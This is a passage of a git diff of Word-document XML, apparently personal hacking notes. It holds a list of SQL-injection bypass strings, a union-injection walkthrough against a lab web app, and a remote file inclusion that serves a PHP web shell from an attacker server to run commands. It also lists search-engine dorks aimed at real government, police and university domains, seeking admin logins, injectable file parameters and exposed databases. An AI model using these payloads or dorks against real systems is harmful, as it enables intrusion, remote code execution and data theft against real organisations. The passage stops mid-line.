+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' '</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>'&amp;'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>'^'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>'*'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' or ''-'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' or '' '</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' or ''&amp;'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' or ''^'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' or ''*'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>"-"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" "</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>"&amp;"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>"^"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>"*"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or ""-"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or "" "</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or ""&amp;"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or ""^"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or ""*"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>") or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>') or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' or 'x'='x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>') or ('x')=('x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>')) or (('x'))=(('x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or "x"="x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>") or ("x")=("x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>")) or (("x"))=(("x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>___________________________________________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Error based injection:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[1] Error</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[UNION] Three basic rules of injecting</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[1]. Balance.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[2]. Inject.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[3]. Commenting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>[+] ERROR:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2&amp;Submit=Submit#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Param: id</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">payload: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>char, -int, ', "</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2'&amp;Submit=Submit#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>DB: MariaDB</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Placement: "2'"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>select ??? from ??? where ??="INPUT";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Table: ?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Columns: ?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>DB name: ?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2' order by 1,2 -- -&amp;Submit=Submit#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Param: id</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Payload: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2' order by 1,2 -- -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>No. of Columns: 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>----------------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>----------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Union Injection:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2' union select 1,2 -- -&amp;Submit=Submit#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Param: id</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Payload: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2' union select 1,2 -- -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>No. of Columns: 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>_____________</w:t>
+      </w:r>
+      <w:r>
+        <w:t>______________________________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2' union select version(),database() -- -&amp;Submit=Submit#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Param: id</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Payload: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2' union select version(),database() -- -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>No. of Columns: 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8909,7 +10025,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -9197,14 +9197,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>``````</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>``````````</w:t>
+        <w:t>````````````````</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9409,8 +9402,3713 @@
         <w:t>-------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>REMOTE FILE INCLUSION:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://192.168.46.235:9004/?file=https://www.adda247.com/images/fpmbanner-updated.svg</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Web Server (192.168.47.167): evil</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>mkdir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> new</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cd new/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cat &gt; evil</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&lt;?</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> echo system($_GET['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>']); ?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -S 192.168.47.167:80</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>PAYLOAD EXECUTION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://192.168.46.235:9004/?file=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>http://192.168.47.167/evil&amp;cmd=id</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>https://pastebin.com/raw/pQzXGtAM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://192.168.46.235:9004/?file=</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://pastebin.com/raw/pQzXGtAM&amp;cmd=id</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>OSINT:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>target: gov.pk</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>subdomains:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:*.*.cdac.in</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:cdac.in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:cdac.in</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -www</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Login:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>intitle:Login</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">site:*.sindhpolice.gov.pk </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>intitle:Login</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Login URL:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">site:*.gov.pk </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inurl:admin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">site:*.gov.pk </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>inurl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:"*.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php?file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>="</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Indexing:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>site:edu.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "index of /"</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>File Type:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>filetype:pdf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>site:edu.pk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>filetype:db</w:t>
